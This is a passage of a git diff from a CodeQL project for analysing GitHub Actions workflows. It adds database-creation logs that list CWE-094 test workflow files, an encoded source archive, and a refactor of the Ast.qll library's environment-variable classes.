freshly trimmed; leave it be. +[2024-03-01 13:05:59] Unpausing evaluation +[2024-03-01 13:05:59] Plumbing command codeql dataset import completed. +[2024-03-01 13:05:59] [PROGRESS] database finalize> TRAP import complete (560ms). +[2024-03-01 13:05:59] Running plumbing command: codeql database cleanup --mode=trim -- /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db +[2024-03-01 13:05:59] [PROGRESS] database cleanup> Cleaning up existing TRAP files after import... +[2024-03-01 13:05:59] [PROGRESS] database cleanup> TRAP files cleaned up (13ms). +[2024-03-01 13:05:59] [PROGRESS] database cleanup> Cleaning up scratch directory... +[2024-03-01 13:05:59] [PROGRESS] database cleanup> Scratch directory cleaned up (1ms). +[2024-03-01 13:05:59] Running plumbing command: codeql dataset cleanup --mode=trim -- /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/db-yaml +[2024-03-01 13:05:59] [PROGRESS] dataset cleanup> Cleaning up dataset in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/db-yaml. +[2024-03-01 13:05:59] Trimming disk cache at /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/db-yaml/default/cache in mode trim. +[2024-03-01 13:05:59] Sequence stamp origin is -6212520900610201313 +[2024-03-01 13:05:59] Pausing evaluation to quickly trim memory at sequence stamp o+0 +[2024-03-01 13:05:59] Unpausing evaluation +[2024-03-01 13:05:59] Pausing evaluation to zealously trim disk at sequence stamp o+1 +[2024-03-01 13:05:59] Unpausing evaluation +[2024-03-01 13:06:00] Trimming completed (3ms): Trimmed disposable data from cache. +[2024-03-01 13:06:00] Pausing evaluation to close the cache at sequence stamp o+2 +[2024-03-01 13:06:00] The disk cache is freshly trimmed; leave it be. +[2024-03-01 13:06:00] Unpausing evaluation +[2024-03-01 13:06:00] [PROGRESS] dataset cleanup> Trimmed disposable data from cache. +[2024-03-01 13:06:00] [PROGRESS] dataset cleanup> Finalizing dataset in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/db-yaml +[2024-03-01 13:06:00] [DETAILS] dataset cleanup> Finished deleting ID pool from /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/db-yaml (3ms). +[2024-03-01 13:06:00] Plumbing command codeql dataset cleanup completed. +[2024-03-01 13:06:00] Plumbing command codeql database cleanup completed with status 0. +[2024-03-01 13:06:00] [PROGRESS] database finalize> Finished zipping source archive (20.00 KiB). +[2024-03-01 13:06:00] Plumbing command codeql database finalize completed. +[2024-03-01 13:06:00] [PROGRESS] database create> Successfully created database at /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db. +[2024-03-01 13:06:00] Terminating normally. diff --git a/db/log/database-index-files-20240301.130558.974.log b/db/log/database-index-files-20240301.130558.974.log new file mode 100644 index 00000000000..e204c6df37d --- /dev/null +++ b/db/log/database-index-files-20240301.130558.974.log @@ -0,0 +1,44 @@ +[2024-03-01 13:05:58] This is codeql database index-files --include-extension=.yaml --include-extension=.yml --size-limit=5m --language=yaml /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db +[2024-03-01 13:05:58] Log file was started late. +[2024-03-01 13:05:59] Using index-files script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml/tools/index-files.sh. +[2024-03-01 13:05:59] [PROGRESS] database index-files> Scanning for files in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094... +[2024-03-01 13:05:59] Calling plumbing command: codeql resolve files --include-extension=.yaml --include-extension=.yml --size-limit=5m /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094 --format=json +[2024-03-01 13:05:59] [PROGRESS] resolve files> Scanning /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094... +[2024-03-01 13:05:59] [PROGRESS] resolve files> Scanning /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/action2... +[2024-03-01 13:05:59] [PROGRESS] resolve files> Scanning /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github... +[2024-03-01 13:05:59] [PROGRESS] resolve files> Scanning /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows... +[2024-03-01 13:05:59] [PROGRESS] resolve files> Scanning /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/action1... +[2024-03-01 13:05:59] Plumbing command codeql resolve files completed: + [ + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/action2/action.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross1.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross3.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross2.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/argus_case_study.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/changed-files.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/image_link_generator.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue_newline.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow1.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow2.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/matrix.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yaml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple1.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple2.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/action1/action.yml" + ] +[2024-03-01 13:05:59] [DETAILS] database index-files> Found 26 files. +[2024-03-01 13:05:59] [PROGRESS] database index-files> /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db: Indexing files in in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094... +[2024-03-01 13:05:59] Using index-files script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml/tools/index-files.sh. +[2024-03-01 13:05:59] [PROGRESS] database index-files> Running command in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml/tools/index-files.sh, /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/working/files-to-index11395055735303062068.list] +[2024-03-01 13:05:59] Terminating normally. diff --git a/db/src.zip b/db/src.zip new file mode 100644 index 0000000000000000000000000000000000000000..3006b787babfbfd5da405e1a7f5736ea762e4abe GIT binary patch literal 20479 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 literal 0 HcmV?d00001 diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index cb561fdf8d1..096f3b9f803 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -1,4 +1,4 @@ -private import codeql.actions.ast.internal.Actions +private import codeql.actions.ast.internal.Yaml private import codeql.Locations /** @@ -23,78 +23,142 @@ class AstNode instanceof YamlNode { /** * Gets a environment variable expression by name in the scope of the current node. */ - Expression getEnvExpr(string name) { - exists(Actions::Env env | - env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) - | - env.(Actions::StepEnv).getStep().getAChildNode*() = this + StringLiteral getEnvVar(string name) { + exists(Env env | env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) | + env.(StepEnv).getStep().getAChildNode*() = this or - env.(Actions::JobEnv).getJob().getAChildNode*() = this + env.(JobEnv).getJob().getAChildNode*() = this or - env.(Actions::WorkflowEnv).getWorkflow().getAChildNode*() = this + env.(WorkflowEnv).getWorkflow().getAChildNode*() = this ) } } +/** A common class for `env` in workflow, job or step. */ +abstract class Env extends AstNode instanceof YamlMapping { } + +/** A workflow level `env` mapping. */ +class WorkflowEnv extends Env { + Workflow workflow; + + WorkflowEnv() { workflow.(YamlMapping).lookup("env") = this } + + /** Gets the workflow this field belongs to. */ + Workflow getWorkflow() { result = workflow } +} + +/** A job level `env` mapping. */ +class JobEnv extends Env { + Job job; + + JobEnv() { job.(YamlMapping).lookup("env") = this } + + /** Gets the job this field belongs to. */ + Job getJob() { result = job } +} + +/** A step level `env` mapping. */ +class StepEnv extends Env { + Step step; + + StepEnv() { step.(YamlMapping).lookup("env") = this } + + /** Gets the step this field belongs to. */ + Step getStep() { result = step } +} + /** - * A composite action + * A custom composite action. This is a mapping at the top level of an Actions YAML action file. + * See https://docs.github.com/en/actions/creating-actions/metadata-syntax-for-github-actions. 